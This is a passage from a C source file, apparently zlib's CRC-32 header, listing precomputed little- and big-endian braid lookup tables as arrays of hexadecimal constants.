0x9c95b0e6, 0xff9269c2, 0x5a9a02ae, 0x399ddb8a, 0x65271795, 0x0620ceb1, 0xa328a5dd, 0xc02f7cf9, 0x32497544, 0x514eac60, 0xf446c70c, 0x97411e28}, {0x00000000, 0x01b5fd1d, 0x036bfa3a, 0x02de0727, 0x06d7f474, 0x07620969, 0x05bc0e4e, 0x0409f353, 0x0dafe8e8, 0x0c1a15f5, 0x0ec412d2, 0x0f71efcf, 0x0b781c9c, 0x0acde181, 0x0813e6a6, 0x09a61bbb, 0x1b5fd1d0, 0x1aea2ccd, 0x18342bea, 0x1981d6f7, 0x1d8825a4, 0x1c3dd8b9, 0x1ee3df9e, 0x1f562283, 0x16f03938, 0x1745c425, 0x159bc302, 0x142e3e1f, 0x1027cd4c, 0x11923051, 0x134c3776, 0x12f9ca6b, 0x36bfa3a0, 0x370a5ebd, 0x35d4599a, 0x3461a487, 0x306857d4, 0x31ddaac9, 0x3303adee, 0x32b650f3, 0x3b104b48, 0x3aa5b655, 0x387bb172, 0x39ce4c6f, 0x3dc7bf3c, 0x3c724221, 0x3eac4506, 0x3f19b81b, 0x2de07270, 0x2c558f6d, 0x2e8b884a, 0x2f3e7557, 0x2b378604, 0x2a827b19, 0x285c7c3e, 0x29e98123, 0x204f9a98, 0x21fa6785, 0x232460a2, 0x22919dbf, 0x26986eec, 0x272d93f1, 0x25f394d6, 0x244669cb, 0x6d7f4740, 0x6ccaba5d, 0x6e14bd7a, 0x6fa14067, 0x6ba8b334, 0x6a1d4e29, 0x68c3490e, 0x6976b413, 0x60d0afa8, 0x616552b5, 0x63bb5592, 0x620ea88f, 0x66075bdc, 0x67b2a6c1, 0x656ca1e6, 0x64d95cfb, 0x76209690, 0x77956b8d, 0x754b6caa, 0x74fe91b7, 0x70f762e4, 0x71429ff9, 0x739c98de, 0x722965c3, 0x7b8f7e78, 0x7a3a8365, 0x78e48442, 0x7951795f, 0x7d588a0c, 0x7ced7711, 0x7e337036, 0x7f868d2b, 0x5bc0e4e0, 0x5a7519fd, 0x58ab1eda, 0x591ee3c7, 0x5d171094, 0x5ca2ed89, 0x5e7ceaae, 0x5fc917b3, 0x566f0c08, 0x57daf115, 0x5504f632, 0x54b10b2f, 0x50b8f87c, 0x510d0561, 0x53d30246, 0x5266ff5b, 0x409f3530, 0x412ac82d, 0x43f4cf0a, 0x42413217, 0x4648c144, 0x47fd3c59, 0x45233b7e, 0x4496c663, 0x4d30ddd8, 0x4c8520c5, 0x4e5b27e2, 0x4feedaff, 0x4be729ac, 0x4a52d4b1, 0x488cd396, 0x49392e8b, 0xdafe8e80, 0xdb4b739d, 0xd99574ba, 0xd82089a7, 0xdc297af4, 0xdd9c87e9, 0xdf4280ce, 0xdef77dd3, 0xd7516668, 0xd6e49b75, 0xd43a9c52, 0xd58f614f, 0xd186921c, 0xd0336f01, 0xd2ed6826, 0xd358953b, 0xc1a15f50, 0xc014a24d, 0xc2caa56a, 0xc37f5877, 0xc776ab24, 0xc6c35639, 0xc41d511e, 0xc5a8ac03, 0xcc0eb7b8, 0xcdbb4aa5, 0xcf654d82, 0xced0b09f, 0xcad943cc, 0xcb6cbed1, 0xc9b2b9f6, 0xc80744eb, 0xec412d20, 0xedf4d03d, 0xef2ad71a, 0xee9f2a07, 0xea96d954, 0xeb232449, 0xe9fd236e, 0xe848de73, 0xe1eec5c8, 0xe05b38d5, 0xe2853ff2, 0xe330c2ef, 0xe73931bc, 0xe68ccca1, 0xe452cb86, 0xe5e7369b, 0xf71efcf0, 0xf6ab01ed, 0xf47506ca, 0xf5c0fbd7, 0xf1c90884, 0xf07cf599, 0xf2a2f2be, 0xf3170fa3, 0xfab11418, 0xfb04e905, 0xf9daee22, 0xf86f133f, 0xfc66e06c, 0xfdd31d71, 0xff0d1a56, 0xfeb8e74b, 0xb781c9c0, 0xb63434dd, 0xb4ea33fa, 0xb55fcee7, 0xb1563db4, 0xb0e3c0a9, 0xb23dc78e, 0xb3883a93, 0xba2e2128, 0xbb9bdc35, 0xb945db12, 0xb8f0260f, 0xbcf9d55c, 0xbd4c2841, 0xbf922f66, 0xbe27d27b, 0xacde1810, 0xad6be50d, 0xafb5e22a, 0xae001f37, 0xaa09ec64, 0xabbc1179, 0xa962165e, 0xa8d7eb43, 0xa171f0f8, 0xa0c40de5, 0xa21a0ac2, 0xa3aff7df, 0xa7a6048c, 0xa613f991, 0xa4cdfeb6, 0xa57803ab, 0x813e6a60, 0x808b977d, 0x8255905a, 0x83e06d47, 0x87e99e14, 0x865c6309, 0x8482642e, 0x85379933, 0x8c918288, 0x8d247f95, 0x8ffa78b2, 0x8e4f85af, 0x8a4676fc, 0x8bf38be1, 0x892d8cc6, 0x889871db, 0x9a61bbb0, 0x9bd446ad, 0x990a418a, 0x98bfbc97, 0x9cb64fc4, 0x9d03b2d9, 0x9fddb5fe, 0x9e6848e3, 0x97ce5358, 0x967bae45, 0x94a5a962, 0x9510547f, 0x9119a72c, 0x90ac5a31, 0x92725d16, 0x93c7a00b}, {0x00000000, 0x6e8c1b41, 0xdd183682, 0xb3942dc3, 0x61416b45, 0x0fcd7004, 0xbc595dc7, 0xd2d54686, 0xc282d68a, 0xac0ecdcb, 0x1f9ae008, 0x7116fb49, 0xa3c3bdcf, 0xcd4fa68e, 0x7edb8b4d, 0x1057900c, 0x5e74ab55, 0x30f8b014, 0x836c9dd7, 0xede08696, 0x3f35c010, 0x51b9db51, 0xe22df692, 0x8ca1edd3, 0x9cf67ddf, 0xf27a669e, 0x41ee4b5d, 0x2f62501c, 0xfdb7169a, 0x933b0ddb, 0x20af2018, 0x4e233b59, 0xbce956aa, 0xd2654deb, 0x61f16028, 0x0f7d7b69, 0xdda83def, 0xb32426ae, 0x00b00b6d, 0x6e3c102c, 0x7e6b8020, 0x10e79b61, 0xa373b6a2, 0xcdffade3, 0x1f2aeb65, 0x71a6f024, 0xc232dde7, 0xacbec6a6, 0xe29dfdff, 0x8c11e6be, 0x3f85cb7d, 0x5109d03c, 0x83dc96ba, 0xed508dfb, 0x5ec4a038, 0x3048bb79, 0x201f2b75, 0x4e933034, 0xfd071df7, 0x938b06b6, 0x415e4030, 0x2fd25b71, 0x9c4676b2, 0xf2ca6df3, 0xa2a3ab15, 0xcc2fb054, 0x7fbb9d97, 0x113786d6, 0xc3e2c050, 0xad6edb11, 0x1efaf6d2, 0x7076ed93, 0x60217d9f, 0x0ead66de, 0xbd394b1d, 0xd3b5505c, 0x016016da, 0x6fec0d9b, 0xdc782058, 0xb2f43b19, 0xfcd70040, 0x925b1b01, 0x21cf36c2, 0x4f432d83, 0x9d966b05, 0xf31a7044, 0x408e5d87, 0x2e0246c6, 0x3e55d6ca, 0x50d9cd8b, 0xe34de048, 0x8dc1fb09, 0x5f14bd8f, 0x3198a6ce, 0x820c8b0d, 0xec80904c, 0x1e4afdbf, 0x70c6e6fe, 0xc352cb3d, 0xadded07c, 0x7f0b96fa, 0x11878dbb, 0xa213a078, 0xcc9fbb39, 0xdcc82b35, 0xb2443074, 0x01d01db7, 0x6f5c06f6, 0xbd894070, 0xd3055b31, 0x609176f2, 0x0e1d6db3, 0x403e56ea, 0x2eb24dab, 0x9d266068, 0xf3aa7b29, 0x217f3daf, 0x4ff326ee, 0xfc670b2d, 0x92eb106c, 0x82bc8060, 0xec309b21, 0x5fa4b6e2, 0x3128ada3, 0xe3fdeb25, 0x8d71f064, 0x3ee5dda7, 0x5069c6e6, 0x9e36506b, 0xf0ba4b2a, 0x432e66e9, 0x2da27da8, 0xff773b2e, 0x91fb206f, 0x226f0dac, 0x4ce316ed, 0x5cb486e1, 0x32389da0, 0x81acb063, 0xef20ab22, 0x3df5eda4, 0x5379f6e5, 0xe0eddb26, 0x8e61c067, 0xc042fb3e, 0xaecee07f, 0x1d5acdbc, 0x73d6d6fd, 0xa103907b, 0xcf8f8b3a, 0x7c1ba6f9, 0x1297bdb8, 0x02c02db4, 0x6c4c36f5, 0xdfd81b36, 0xb1540077, 0x638146f1, 0x0d0d5db0, 0xbe997073, 0xd0156b32, 0x22df06c1, 0x4c531d80, 0xffc73043, 0x914b2b02, 0x439e6d84, 0x2d1276c5, 0x9e865b06, 0xf00a4047, 0xe05dd04b, 0x8ed1cb0a, 0x3d45e6c9, 0x53c9fd88, 0x811cbb0e, 0xef90a04f, 0x5c048d8c, 0x328896cd, 0x7cabad94, 0x1227b6d5, 0xa1b39b16, 0xcf3f8057, 0x1deac6d1, 0x7366dd90, 0xc0f2f053, 0xae7eeb12, 0xbe297b1e, 0xd0a5605f, 0x63314d9c, 0x0dbd56dd, 0xdf68105b, 0xb1e40b1a, 0x027026d9, 0x6cfc3d98, 0x3c95fb7e, 0x5219e03f, 0xe18dcdfc, 0x8f01d6bd, 0x5dd4903b, 0x33588b7a, 0x80cca6b9, 0xee40bdf8, 0xfe172df4, 0x909b36b5, 0x230f1b76, 0x4d830037, 0x9f5646b1, 0xf1da5df0, 0x424e7033, 0x2cc26b72, 0x62e1502b, 0x0c6d4b6a, 0xbff966a9, 0xd1757de8, 0x03a03b6e, 0x6d2c202f, 0xdeb80dec, 0xb03416ad, 0xa06386a1, 0xceef9de0, 0x7d7bb023, 0x13f7ab62, 0xc122ede4, 0xafaef6a5, 0x1c3adb66, 0x72b6c027, 0x807cadd4, 0xeef0b695, 0x5d649b56, 0x33e88017, 0xe13dc691, 0x8fb1ddd0, 0x3c25f013, 0x52a9eb52, 0x42fe7b5e, 0x2c72601f, 0x9fe64ddc, 0xf16a569d, 0x23bf101b, 0x4d330b5a, 0xfea72699, 0x902b3dd8, 0xde080681, 0xb0841dc0, 0x03103003, 0x6d9c2b42, 0xbf496dc4, 0xd1c57685, 0x62515b46, 0x0cdd4007, 0x1c8ad00b, 0x7206cb4a, 0xc192e689, 0xaf1efdc8, 0x7dcbbb4e, 0x1347a00f, 0xa0d38dcc, 0xce5f968d}, {0x00000000, 0xe71da697, 0x154a4b6f, 0xf257edf8, 0x2a9496de, 0xcd893049, 0x3fdeddb1, 0xd8c37b26, 0x55292dbc, 0xb2348b2b, 0x406366d3, 0xa77ec044, 0x7fbdbb62, 0x98a01df5, 0x6af7f00d, 0x8dea569a, 0xaa525b78, 0x4d4ffdef, 0xbf181017, 0x5805b680, 0x80c6cda6, 0x67db6b31, 0x958c86c9, 0x7291205e, 0xff7b76c4, 0x1866d053, 0xea313dab, 0x0d2c9b3c, 0xd5efe01a, 0x32f2468d, 0xc0a5ab75, 0x27b80de2, 0x8fd5b0b1, 0x68c81626, 0x9a9ffbde, 0x7d825d49, 0xa541266f, 0x425c80f8, 0xb00b6d00, 0x5716cb97, 0xdafc9d0d, 0x3de13b9a, 0xcfb6d662, 0x28ab70f5, 0xf0680bd3, 0x1775ad44, 0xe52240bc, 0x023fe62b, 0x2587ebc9, 0xc29a4d5e, 0x30cda0a6, 0xd7d00631, 0x0f137d17, 0xe80edb80, 0x1a593678, 0xfd4490ef, 0x70aec675, 0x97b360e2, 0x65e48d1a, 0x82f92b8d, 0x5a3a50ab, 0xbd27f63c, 0x4f701bc4, 0xa86dbd53, 0xc4da6723, 0x23c7c1b4, 0xd1902c4c, 0x368d8adb, 0xee4ef1fd, 0x0953576a, 0xfb04ba92, 0x1c191c05, 0x91f34a9f, 0x76eeec08, 0x84b901f0, 0x63a4a767, 0xbb67dc41, 0x5c7a7ad6, 0xae2d972e, 0x493031b9, 0x6e883c5b, 0x89959acc, 0x7bc27734, 0x9cdfd1a3, 0x441caa85, 0xa3010c12, 0x5156e1ea, 0xb64b477d, 0x3ba111e7, 0xdcbcb770, 0x2eeb5a88, 0xc9f6fc1f, 0x11358739, 0xf62821ae, 0x047fcc56, 0xe3626ac1, 0x4b0fd792, 0xac127105, 0x5e459cfd, 0xb9583a6a, 0x619b414c, 0x8686e7db, 0x74d10a23, 0x93ccacb4, 0x1e26fa2e, 0xf93b5cb9, 0x0b6cb141, 0xec7117d6, 0x34b26cf0, 0xd3afca67, 0x21f8279f, 0xc6e58108, 0xe15d8cea, 0x06402a7d, 0xf417c785, 0x130a6112, 0xcbc91a34, 0x2cd4bca3, 0xde83515b, 0x399ef7cc, 0xb474a156, 0x536907c1, 0xa13eea39, 0x46234cae, 0x9ee03788, 0x79fd911f, 0x8baa7ce7, 0x6cb7da70, 0x52c5c807, 0xb5d86e90, 0x478f8368, 0xa09225ff, 0x78515ed9, 0x9f4cf84e, 0x6d1b15b6, 0x8a06b321, 0x07ece5bb, 0xe0f1432c, 0x12a6aed4, 0xf5bb0843, 0x2d787365, 0xca65d5f2, 0x3832380a, 0xdf2f9e9d, 0xf897937f, 0x1f8a35e8, 0xedddd810, 0x0ac07e87, 0xd20305a1, 0x351ea336, 0xc7494ece, 0x2054e859, 0xadbebec3, 0x4aa31854, 0xb8f4f5ac, 0x5fe9533b, 0x872a281d, 0x60378e8a, 0x92606372, 0x757dc5e5, 0xdd1078b6, 0x3a0dde21, 0xc85a33d9, 0x2f47954e, 0xf784ee68, 0x109948ff, 0xe2cea507, 0x05d30390, 0x8839550a, 0x6f24f39d, 0x9d731e65, 0x7a6eb8f2, 0xa2adc3d4, 0x45b06543, 0xb7e788bb, 0x50fa2e2c, 0x774223ce, 0x905f8559, 0x620868a1, 0x8515ce36, 0x5dd6b510, 0xbacb1387, 0x489cfe7f, 0xaf8158e8, 0x226b0e72, 0xc576a8e5, 0x3721451d, 0xd03ce38a, 0x08ff98ac, 0xefe23e3b, 0x1db5d3c3, 0xfaa87554, 0x961faf24, 0x710209b3, 0x8355e44b, 0x644842dc, 0xbc8b39fa, 0x5b969f6d, 0xa9c17295, 0x4edcd402, 0xc3368298, 0x242b240f, 0xd67cc9f7, 0x31616f60, 0xe9a21446, 0x0ebfb2d1, 0xfce85f29, 0x1bf5f9be, 0x3c4df45c, 0xdb5052cb, 0x2907bf33, 0xce1a19a4, 0x16d96282, 0xf1c4c415, 0x039329ed, 0xe48e8f7a, 0x6964d9e0, 0x8e797f77, 0x7c2e928f, 0x9b333418, 0x43f04f3e, 0xa4ede9a9, 0x56ba0451, 0xb1a7a2c6, 0x19ca1f95, 0xfed7b902, 0x0c8054fa, 0xeb9df26d, 0x335e894b, 0xd4432fdc, 0x2614c224, 0xc10964b3, 0x4ce33229, 0xabfe94be, 0x59a97946, 0xbeb4dfd1, 0x6677a4f7, 0x816a0260, 0x733def98, 0x9420490f, 0xb39844ed, 0x5485e27a, 0xa6d20f82, 0x41cfa915, 0x990cd233, 0x7e1174a4, 0x8c46995c, 0x6b5b3fcb, 0xe6b16951, 0x01accfc6, 0xf3fb223e, 0x14e684a9, 0xcc25ff8f, 0x2b385918, 0xd96fb4e0, 0x3e721277}, {0x00000000, 0xa58b900e, 0x9066265d, 0x35edb653, 0xfbbd4afb, 0x5e36daf5, 0x6bdb6ca6, 0xce50fca8, 0x2c0b93b7, 0x898003b9, 0xbc6db5ea, 0x19e625e4, 0xd7b6d94c, 0x723d4942, 0x47d0ff11, 0xe25b6f1f, 0x5817276e, 0xfd9cb760, 0xc8710133, 0x6dfa913d, 0xa3aa6d95, 0x0621fd9b, 0x33cc4bc8, 0x9647dbc6, 0x741cb4d9, 0xd19724d7, 0xe47a9284, 0x41f1028a, 0x8fa1fe22, 0x2a2a6e2c, 0x1fc7d87f, 0xba4c4871, 0xb02e4edc, 0x15a5ded2, 0x20486881, 0x85c3f88f, 0x4b930427, 0xee189429, 0xdbf5227a, 0x7e7eb274, 0x9c25dd6b, 0x39ae4d65, 0x0c43fb36, 0xa9c86b38, 0x67989790, 0xc213079e, 0xf7feb1cd, 0x527521c3, 0xe83969b2, 0x4db2f9bc, 0x785f4fef, 0xddd4dfe1, 0x13842349, 0xb60fb347, 0x83e20514, 0x2669951a, 0xc432fa05, 0x61b96a0b, 0x5454dc58, 0xf1df4c56, 0x3f8fb0fe, 0x9a0420f0, 0xafe996a3, 0x0a6206ad, 0xbb2d9bf9, 0x1ea60bf7, 0x2b4bbda4, 0x8ec02daa, 0x4090d102, 0xe51b410c, 0xd0f6f75f, 0x757d6751, 0x9726084e, 0x32ad9840, 0x07402e13, 0xa2cbbe1d, 0x6c9b42b5, 0xc910d2bb, 0xfcfd64e8, 0x5976f4e6, 0xe33abc97, 0x46b12c99, 0x735c9aca, 0xd6d70ac4, 0x1887f66c, 0xbd0c6662, 0x88e1d031, 0x2d6a403f, 0xcf312f20, 0x6ababf2e, 0x5f57097d, 0xfadc9973, 0x348c65db, 0x9107f5d5, 0xa4ea4386, 0x0161d388, 0x0b03d525, 0xae88452b, 0x9b65f378, 0x3eee6376, 0xf0be9fde, 0x55350fd0, 0x60d8b983, 0xc553298d, 0x27084692, 0x8283d69c, 0xb76e60cf, 0x12e5f0c1, 0xdcb50c69, 0x793e9c67, 0x4cd32a34, 0xe958ba3a, 0x5314f24b, 0xf69f6245, 0xc372d416, 0x66f94418, 0xa8a9b8b0, 0x0d2228be, 0x38cf9eed, 0x9d440ee3, 0x7f1f61fc, 0xda94f1f2, 0xef7947a1, 0x4af2d7af, 0x84a22b07, 0x2129bb09, 0x14c40d5a, 0xb14f9d54, 0xad2a31b3, 0x08a1a1bd, 0x3d4c17ee, 0x98c787e0, 0x56977b48, 0xf31ceb46, 0xc6f15d15, 0x637acd1b, 0x8121a204, 0x24aa320a, 0x11478459, 0xb4cc1457, 0x7a9ce8ff, 0xdf1778f1, 0xeafacea2, 0x4f715eac, 0xf53d16dd, 0x50b686d3, 0x655b3080, 0xc0d0a08e, 0x0e805c26, 0xab0bcc28, 0x9ee67a7b, 0x3b6dea75, 0xd936856a, 0x7cbd1564, 0x4950a337, 0xecdb3339, 0x228bcf91, 0x87005f9f, 0xb2ede9cc, 0x176679c2, 0x1d047f6f, 0xb88fef61, 0x8d625932, 0x28e9c93c, 0xe6b93594, 0x4332a59a, 0x76df13c9, 0xd35483c7, 0x310fecd8, 0x94847cd6, 0xa169ca85, 0x04e25a8b, 0xcab2a623, 0x6f39362d, 0x5ad4807e, 0xff5f1070, 0x45135801, 0xe098c80f, 0xd5757e5c, 0x70feee52, 0xbeae12fa, 0x1b2582f4, 0x2ec834a7, 0x8b43a4a9, 0x6918cbb6, 0xcc935bb8, 0xf97eedeb, 0x5cf57de5, 0x92a5814d, 0x372e1143, 0x02c3a710, 0xa748371e, 0x1607aa4a, 0xb38c3a44, 0x86618c17, 0x23ea1c19, 0xedbae0b1, 0x483170bf, 0x7ddcc6ec, 0xd85756e2, 0x3a0c39fd, 0x9f87a9f3, 0xaa6a1fa0, 0x0fe18fae, 0xc1b17306, 0x643ae308, 0x51d7555b, 0xf45cc555, 0x4e108d24, 0xeb9b1d2a, 0xde76ab79, 0x7bfd3b77, 0xb5adc7df, 0x102657d1, 0x25cbe182, 0x8040718c, 0x621b1e93, 0xc7908e9d, 0xf27d38ce, 0x57f6a8c0, 0x99a65468, 0x3c2dc466, 0x09c07235, 0xac4be23b, 0xa629e496, 0x03a27498, 0x364fc2cb, 0x93c452c5, 0x5d94ae6d, 0xf81f3e63, 0xcdf28830, 0x6879183e, 0x8a227721, 0x2fa9e72f, 0x1a44517c, 0xbfcfc172, 0x719f3dda, 0xd414add4, 0xe1f91b87, 0x44728b89, 0xfe3ec3f8, 0x5bb553f6, 0x6e58e5a5, 0xcbd375ab, 0x05838903, 0xa008190d, 0x95e5af5e, 0x306e3f50, 0xd235504f, 0x77bec041, 0x42537612, 0xe7d8e61c, 0x29881ab4, 0x8c038aba, 0xb9ee3ce9, 0x1c65ace7}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0x0e908ba500000000, 0x5d26669000000000, 0x53b6ed3500000000, 0xfb4abdfb00000000, 0xf5da365e00000000, 0xa66cdb6b00000000, 0xa8fc50ce00000000, 0xb7930b2c00000000, 0xb903808900000000, 0xeab56dbc00000000, 0xe425e61900000000, 0x4cd9b6d700000000, 0x42493d7200000000, 0x11ffd04700000000, 0x1f6f5be200000000, 0x6e27175800000000, 0x60b79cfd00000000, 0x330171c800000000, 0x3d91fa6d00000000, 0x956daaa300000000, 0x9bfd210600000000, 0xc84bcc3300000000, 0xc6db479600000000, 0xd9b41c7400000000, 0xd72497d100000000, 0x84927ae400000000, 0x8a02f14100000000, 0x22fea18f00000000, 0x2c6e2a2a00000000, 0x7fd8c71f00000000, 0x71484cba00000000, 0xdc4e2eb000000000, 0xd2dea51500000000, 0x8168482000000000, 0x8ff8c38500000000, 0x2704934b00000000, 0x299418ee00000000, 0x7a22f5db00000000, 0x74b27e7e00000000, 0x6bdd259c00000000, 0x654dae3900000000, 0x36fb430c00000000, 0x386bc8a900000000, 0x9097986700000000, 0x9e0713c200000000, 0xcdb1fef700000000, 0xc321755200000000, 0xb26939e800000000, 0xbcf9b24d00000000, 0xef4f5f7800000000, 0xe1dfd4dd00000000, 0x4923841300000000, 0x47b30fb600000000, 0x1405e28300000000, 0x1a95692600000000, 0x05fa32c400000000, 0x0b6ab96100000000, 0x58dc545400000000, 0x564cdff100000000, 0xfeb08f3f00000000, 0xf020049a00000000, 0xa396e9af00000000, 0xad06620a00000000, 0xf99b2dbb00000000, 0xf70ba61e00000000, 0xa4bd4b2b00000000, 0xaa2dc08e00000000, 0x02d1904000000000, 0x0c411be500000000, 0x5ff7f6d000000000, 0x51677d7500000000, 0x4e08269700000000, 0x4098ad3200000000, 0x132e400700000000, 0x1dbecba200000000, 0xb5429b6c00000000, 0xbbd210c900000000, 0xe864fdfc00000000, 0xe6f4765900000000, 0x97bc3ae300000000, 0x992cb14600000000, 0xca9a5c7300000000, 0xc40ad7d600000000, 0x6cf6871800000000, 0x62660cbd00000000, 0x31d0e18800000000, 0x3f406a2d00000000, 0x202f31cf00000000, 0x2ebfba6a00000000, 0x7d09575f00000000, 0x7399dcfa00000000, 0xdb658c3400000000, 0xd5f5079100000000, 0x8643eaa400000000, 0x88d3610100000000, 0x25d5030b00000000, 0x2b4588ae00000000, 0x78f3659b00000000, 0x7663ee3e00000000, 0xde9fbef000000000, 0xd00f355500000000, 0x83b9d86000000000, 0x8d2953c500000000, 0x9246082700000000, 0x9cd6838200000000, 0xcf606eb700000000, 0xc1f0e51200000000, 0x690cb5dc00000000, 0x679c3e7900000000, 0x342ad34c00000000, 0x3aba58e900000000, 0x4bf2145300000000, 0x45629ff600000000, 0x16d472c300000000, 0x1844f96600000000, 0xb0b8a9a800000000, 0xbe28220d00000000, 0xed9ecf3800000000, 0xe30e449d00000000, 0xfc611f7f00000000, 0xf2f194da00000000, 0xa14779ef00000000, 0xafd7f24a00000000, 0x072ba28400000000, 0x09bb292100000000, 0x5a0dc41400000000, 0x549d4fb100000000, 0xb3312aad00000000, 0xbda1a10800000000, 0xee174c3d00000000, 0xe087c79800000000, 0x487b975600000000, 0x46eb1cf300000000, 0x155df1c600000000, 0x1bcd7a6300000000, 0x04a2218100000000, 0x0a32aa2400000000, 0x5984471100000000, 0x5714ccb400000000, 0xffe89c7a00000000, 0xf17817df00000000, 0xa2cefaea00000000, 0xac5e714f00000000, 0xdd163df500000000, 0xd386b65000000000, 0x80305b6500000000, 0x8ea0d0c000000000, 0x265c800e00000000, 0x28cc0bab00000000, 0x7b7ae69e00000000, 0x75ea6d3b00000000, 0x6a8536d900000000, 0x6415bd7c00000000, 0x37a3504900000000, 0x3933dbec00000000, 0x91cf8b2200000000, 0x9f5f008700000000, 0xcce9edb200000000, 0xc279661700000000, 0x6f7f041d00000000, 0x61ef8fb800000000, 0x3259628d00000000, 0x3cc9e92800000000, 0x9435b9e600000000, 0x9aa5324300000000, 0xc913df7600000000, 0xc78354d300000000, 0xd8ec0f3100000000, 0xd67c849400000000, 0x85ca69a100000000, 0x8b5ae20400000000, 0x23a6b2ca00000000, 0x2d36396f00000000, 0x7e80d45a00000000, 0x70105fff00000000, 0x0158134500000000, 0x0fc898e000000000, 0x5c7e75d500000000, 0x52eefe7000000000, 0xfa12aebe00000000, 0xf482251b00000000, 0xa734c82e00000000, 0xa9a4438b00000000, 0xb6cb186900000000, 0xb85b93cc00000000, 0xebed7ef900000000, 0xe57df55c00000000, 0x4d81a59200000000, 0x43112e3700000000, 0x10a7c30200000000, 0x1e3748a700000000, 0x4aaa071600000000, 0x443a8cb300000000, 0x178c618600000000, 0x191cea2300000000, 0xb1e0baed00000000, 0xbf70314800000000, 0xecc6dc7d00000000, 0xe25657d800000000, 0xfd390c3a00000000, 0xf3a9879f00000000, 0xa01f6aaa00000000, 0xae8fe10f00000000, 0x0673b1c100000000, 0x08e33a6400000000, 0x5b55d75100000000, 0x55c55cf400000000, 0x248d104e00000000, 0x2a1d9beb00000000, 0x79ab76de00000000, 0x773bfd7b00000000, 0xdfc7adb500000000, 0xd157261000000000, 0x82e1cb2500000000, 0x8c71408000000000, 0x931e1b6200000000, 0x9d8e90c700000000, 0xce387df200000000, 0xc0a8f65700000000, 0x6854a69900000000, 0x66c42d3c00000000, 0x3572c00900000000, 0x3be24bac00000000, 0x96e429a600000000, 0x9874a20300000000, 0xcbc24f3600000000, 0xc552c49300000000, 0x6dae945d00000000, 0x633e1ff800000000, 0x3088f2cd00000000, 0x3e18796800000000, 0x2177228a00000000, 0x2fe7a92f00000000, 0x7c51441a00000000, 0x72c1cfbf00000000, 0xda3d9f7100000000, 0xd4ad14d400000000, 0x871bf9e100000000, 0x898b724400000000, 0xf8c33efe00000000, 0xf653b55b00000000, 0xa5e5586e00000000, 0xab75d3cb00000000, 0x0389830500000000, 0x0d1908a000000000, 0x5eafe59500000000, 0x503f6e3000000000, 0x4f5035d200000000, 0x41c0be7700000000, 0x1276534200000000, 0x1ce6d8e700000000, 0xb41a882900000000, 0xba8a038c00000000, 0xe93ceeb900000000, 0xe7ac651c00000000}, {0x0000000000000000, 0x97a61de700000000, 0x6f4b4a1500000000, 0xf8ed57f200000000, 0xde96942a00000000, 0x493089cd00000000, 0xb1ddde3f00000000, 0x267bc3d800000000, 0xbc2d295500000000, 0x2b8b34b200000000, 0xd366634000000000, 0x44c07ea700000000, 0x62bbbd7f00000000, 0xf51da09800000000, 0x0df0f76a00000000, 0x9a56ea8d00000000, 0x785b52aa00000000, 0xeffd4f4d00000000, 0x171018bf00000000, 0x80b6055800000000, 0xa6cdc68000000000, 0x316bdb6700000000, 0xc9868c9500000000, 0x5e20917200000000, 0xc4767bff00000000, 0x53d0661800000000, 0xab3d31ea00000000, 0x3c9b2c0d00000000, 0x1ae0efd500000000, 0x8d46f23200000000, 0x75aba5c000000000, 0xe20db82700000000, 0xb1b0d58f00000000, 0x2616c86800000000, 0xdefb9f9a00000000, 0x495d827d00000000, 0x6f2641a500000000, 0xf8805c4200000000, 0x006d0bb000000000, 0x97cb165700000000, 0x0d9dfcda00000000, 0x9a3be13d00000000, 0x62d6b6cf00000000, 0xf570ab2800000000, 0xd30b68f000000000, 0x44ad751700000000, 0xbc4022e500000000, 0x2be63f0200000000, 0xc9eb872500000000, 0x5e4d9ac200000000, 0xa6a0cd3000000000, 0x3106d0d700000000, 0x177d130f00000000, 0x80db0ee800000000, 0x7836591a00000000, 0xef9044fd00000000, 0x75c6ae7000000000, 0xe260b39700000000, 0x1a8de46500000000, 0x8d2bf98200000000, 0xab503a5a00000000, 0x3cf627bd00000000, 0xc41b704f00000000, 0x53bd6da800000000, 0x2367dac400000000, 0xb4c1c72300000000, 0x4c2c90d100000000, 0xdb8a8d3600000000, 0xfdf14eee00000000, 0x6a57530900000000, 0x92ba04fb00000000, 0x051c191c00000000, 0x9f4af39100000000, 0x08ecee7600000000, 0xf001b98400000000, 0x67a7a46300000000, 0x41dc67bb00000000, 0xd67a7a5c00000000, 0x2e972dae00000000, 0xb931304900000000, 0x5b3c886e00000000, 0xcc9a958900000000, 0x3477c27b00000000, 0xa3d1df9c00000000, 0x85aa1c4400000000, 0x120c01a300000000, 0xeae1565100000000, 0x7d474bb600000000, 0xe711a13b00000000, 0x70b7bcdc00000000, 0x885aeb2e00000000, 0x1ffcf6c900000000, 0x3987351100000000, 0xae2128f600000000, 0x56cc7f0400000000, 0xc16a62e300000000, 0x92d70f4b00000000, 0x057112ac00000000, 0xfd9c455e00000000, 0x6a3a58b900000000, 0x4c419b6100000000, 0xdbe7868600000000, 0x230ad17400000000, 0xb4accc9300000000, 0x2efa261e00000000, 0xb95c3bf900000000, 0x41b16c0b00000000, 0xd61771ec00000000, 0xf06cb23400000000, 0x67caafd300000000, 0x9f27f82100000000, 0x0881e5c600000000, 0xea8c5de100000000, 0x7d2a400600000000, 0x85c717f400000000, 0x12610a1300000000, 0x341ac9cb00000000, 0xa3bcd42c00000000, 0x5b5183de00000000, 0xccf79e3900000000, 0x56a174b400000000, 0xc107695300000000, 0x39ea3ea100000000, 0xae4c234600000000, 0x8837e09e00000000, 0x1f91fd7900000000, 0xe77caa8b00000000, 0x70dab76c00000000, 0x07c8c55200000000, 0x906ed8b500000000, 0x68838f4700000000, 0xff2592a000000000, 0xd95e517800000000, 0x4ef84c9f00000000, 0xb6151b6d00000000, 0x21b3068a00000000, 0xbbe5ec0700000000, 0x2c43f1e000000000, 0xd4aea61200000000, 0x4308bbf500000000, 0x6573782d00000000, 0xf2d565ca00000000, 0x0a38323800000000, 0x9d9e2fdf00000000, 0x7f9397f800000000, 0xe8358a1f00000000, 0x10d8dded00000000, 0x877ec00a00000000, 0xa10503d200000000, 0x36a31e3500000000, 0xce4e49c700000000, 0x59e8542000000000, 0xc3bebead00000000, 0x5418a34a00000000, 0xacf5f4b800000000, 0x3b53e95f00000000, 0x1d282a8700000000, 0x8a8e376000000000, 0x7263609200000000, 0xe5c57d7500000000, 0xb67810dd00000000, 0x21de0d3a00000000, 0xd9335ac800000000, 0x4e95472f00000000, 0x68ee84f700000000, 0xff48991000000000, 0x07a5cee200000000, 0x9003d30500000000, 0x0a55398800000000, 